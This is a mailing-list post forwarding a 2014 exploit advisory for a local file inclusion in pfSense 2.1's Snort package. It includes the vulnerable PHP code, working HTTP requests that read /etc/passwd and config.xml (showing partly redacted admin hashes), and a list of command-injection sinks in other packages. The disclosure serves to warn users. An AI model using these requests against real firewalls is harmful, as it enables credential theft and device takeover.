Show! (na visão de pesquisa em vulnerabilidades) @firebitsbr
2014-01-28 Welkson Renny de Medeiros <welk...@gmail.com> > Senhores, boa tarde! > > Alerta pra quem usa o package Snort no pfSense. > > Welkson > > ... > > ###################################################################### > # _ ___ _ _ ____ ____ _ _____ > # | | / _ \| \ | |/ ___|/ ___| / \|_ _| > # | | | | | | \| | | _| | / _ \ | | > # | |__| |_| | |\ | |_| | |___ / ___ \| | > # |_____\___/|_| \_|\____|\____/_/ \_\_| > # > # Exploit Title: pfSense 2.1 Privilege Escalation from less privileged > users (LFI/RCE) > # Date: 25/01/2014 (0-day) > # Exploit Author: @u0x (Pichaya Morimoto) > # Software Link: www.pfsense.org > # Category: Local File Inclusion (LFI) & Privilege Escalation > # Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2 > # > ##################################################################### > > > > pfSense firewall/router distribution description : > > ====================================================================== > > pfSense is a free, open source customized distribution of FreeBSD tailored > for use as a firewall and router. In addition to being a powerful, flexible > firewalling and routing platform, it includes a long list of related > features and a package system allowing further expandability without adding > bloat and potential security vulnerabilities to the base distribution. > pfSense is a popular project with more than 1 million downloads since its > inception, and proven in countless installations ranging from small home > networks protecting a PC and an Xbox to large corporations, universities > and other organizations protecting thousands of network devices. > > This project started in 2004 as a fork of the m0n0wall project, but focused > towards full PC installations rather than the embedded hardware focus of > m0n0wall. pfSense also offers an embedded image for Compact Flash based > installations, however it is not our primary focus. > > Attack Scenario > > ====================================================================== > > Authenticated users with only permission to access some packages in web gui > (a.k.a. webConfigurator) will be able to escalate themselves to other > privileged admin by reading /conf/config.xml file through bugs (i.e. Snort > LFI), result in fully compromise the pfSense. > > This attack abuse the user privilege scheme with some of official packages > (System > Package Manager) > > * Session Hijacking also possible to steal less privileged user sessions to > perform this trick due to "http" admin by default webConfigurator. > > Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion > Vulnerability > > Vulnerable file: > > ====================================================================== > > snort_log_view.php > > [+] Checksum > SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c > MD5: cd767e46a4e9e09ede7fd26560e37f14 > > Vulnerable Source Code : > ====================================================================== > http://www.pfsense.com/packages/config/snort/snort_log_view.php > > https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php > > ...(deducted)... > > $contents = ''; > // Read the contents of the argument passed to us. > // Is it a fully qualified path and file? > > if (file_exists($_GET['logfile'])) > $contents = file_get_contents($_GET['logfile']); > // It is not something we can display, so print an error. > else > $contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not > found!"); > $pgtitle = array(gettext("Snort"), gettext("Log File Viewer")); > ?> > > ...(deducted)... > <textarea style="width:100%; height:100%;" readonly wrap="off" rows="33" > cols="80" name="code2"><?=$contents;?></textarea> > ...(deducted)... > > > > Proof of Concept 1 : Arbitrary File Inclusion > ====================================================================== > > GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1 > Host: firewall1.pentestlab1:1337 > Connection: keep-alive > Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 > Accept-Encoding: gzip,deflate,sdch > Accept-Language: th,en-US;q=0.8,en;q=0.6 > Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083 > > HTTP/1.1 200 OK > Expires: Mon, 27 Jan 2014 07:25:10 GMT > Expires: Thu, 19 Nov 1981 08:52:00 GMT > Cache-Control: max-age=180000 > Cache-Control: no-store, no-cache, must-revalidate, post-check=0, > pre-check=0 > Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT > X-Frame-Options: SAMEORIGIN > Pragma: no-cache > Content-type: text/html > Transfer-Encoding: chunked > Date: Sat, 25 Jan 2014 05:25:10 GMT > Server: lighttpd/1.4.32 > > ...(deducted)... > <td colspan="2" valign="top" class="label"> > <div style="background: #eeeeee; width:100%; height:100%;" > id="textareaitem"><!-- NOTE: The opening *and* the closing textarea tag > must be on the same line. --> > <textarea style="width:100%; height:100%;" readonly wrap="off" > rows="33" cols="80" name="code2">root:*:0:0:Charlie &:/root:/bin/sh > toor:*:0:0:Bourne-again Superuser:/root: > daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin > operator:*:2:5:System &:/:/usr/sbin/nologin > ...(deducted)... > havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin > squid:*:100:100:squid caching-proxy pseudo > user:/var/squid:/usr/sbin/nologin > c_icap:*:959:959:c-icap daemon:/var/empty:/usr/sbin/nologin > snortadmin:*:2000:65534:Bill Gates:/home/snortadmin:/sbin/nologin > ...(deducted)... > > Proof of Concept 2 : Directory Traversal > # This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) + > Lighttpd/1.4.32 on FreeBSD 8.3 x64 > ====================================================================== > > GET /snort/snort_log_view.php?logfile=../ HTTP/1.1 > Host: firewall1.pentestlab1:1337 > Connection: keep-alive > Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 > Accept-Encoding: gzip,deflate,sdch > Accept-Language: th,en-US;q=0.8,en;q=0.6 > Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083 > > ...(deducted)... > ¬p.Z..-p firewall_rules_edit.php(R)p > xmlrpc.php¯p > wizard.php°p > > vpn_pptp_users_edit.php±pvpn_pptp_users.php²pvpn_pptp.php³pvpn_pppoe_edit.php´p > vpn_pppoe.phpµp vpn_openvpn_server.php¶pvpn_openvpn_csc.php·p > vpn_openvpn_client.php¸p > vpn_l2tp_users_edit.php¹pvpn_l2tp_users.phpºpvpn_l2tp.php>>p > vpn_ipsec_phase2.php 1/4 p vpn_ipsec_phase1.php 1/2 p(vpn_ipsec_mobile.php > 3/4 p > vpn_ipsec_keys_edit.php¿pvpn_ipsec_keys.phpÀp > vpn_ipsec.phpÁpuploadconfig.phpÂptreeview.cssÃpwizardsÏp > > tree-imagesÛp0$system_usermanager_settings_test.phpÜp8,system_usermanager_settings_ldapacpicker.phpÿÿÿÝp(system_usermanager_settings.phpÞp,! > ...(deducted)... > > Proof of Concept 3 : Privilege Escalation > # -rw-r--r-- root wheel 30k Jan 25 11:35 config.xml > ====================================================================== > > GET /snort/snort_log_view.php?logfile=/conf/config.xml HTTP/1.1 > Host: firewall1.pentestlab1:1337 > Connection: keep-alive > Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 > Accept-Encoding: gzip,deflate,sdch > Accept-Language: th,en-US;q=0.8,en;q=0.6 > Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083 > > ...(deducted)... > <group> > <name>office</name> > <description><![CDATA[Main Office Employees]]></description> > <member>2000</member> > <gid>2000</gid> > </group> > <user> > <name>admin</name> > <descr><![CDATA[System Administrator]]></descr> > <scope>system</scope> > <groupname>admins</groupname> > <password>$1$y8KiO3ow$mmMX4R0hE...(deducted)...</password> > <uid>0</uid> > <priv>user-shell-access</priv> > <md5-hash>d4383b6f4c9fa...(deducted)...</md5-hash> > <nt-hash>356239666432306265376131653...(deducted)...</nt-hash> > </user> > ...(deducted)... > > P.S. There are many other ways to escalate from less-privileged users using > official packages. > For example, some OS command injections (Feel free to dig deeper than me.. > LoL) > > arping/arping.inc:38: system("arping -c3 " . $_POST['hostip']); > tinc/tinc.inc:173: mwexec("/sbin/ifconfig > {$realif} -group " . $a_ifgroups[$_GET['id']]['ifname']); > spamd/spamd_db_ext.php:57:exec("echo {$_GET['action']} > /tmp/tmp"); > spamd/spamd_db.php:106: $status = exec("/usr/local/sbin/spamdb | grep > \"{$_GET['getstatus']}\""); > freeswitch_dev/v_profiles.tmp:38: exec("cp > ".$v_conf_dir.".orig/sip_profiles/".$_GET['f']." > ".$v_conf_dir."/sip_profiles/".$_GET['f']); > freeswitch_dev/v_profiles.tmp:60: exec("rm > ".$v_conf_dir."/sip_profiles/".$_GET['f']); > snort-dev/snortsam-package-code/snort_new.inc:112: > exec("/bin/ln -s > /usr/local/etc/snort/snortDBrules/DB/{$_POST['ruledbname']}/rules > {$pathToSnortDir}/{$newSnortDir}/rules"); > snort-dev/snortsam-package-code/snort_new.inc:129: > $sidLinePosPre = exec('/usr/bin/sed -n /sid:' . $_POST['snortSidNum'] . > '\;/= ' . $workingFile); > > # Special Thanks : Xelenonz, pistachio, pe3z and 2600 Thailand. > # Video PoC (Thai version) : https://www.youtube.com/watch?v=dGwOUccGZnE > ------------------------- > Histórico: http://www.fug.com.br/historico/html/freebsd/ > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd > ------------------------- Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
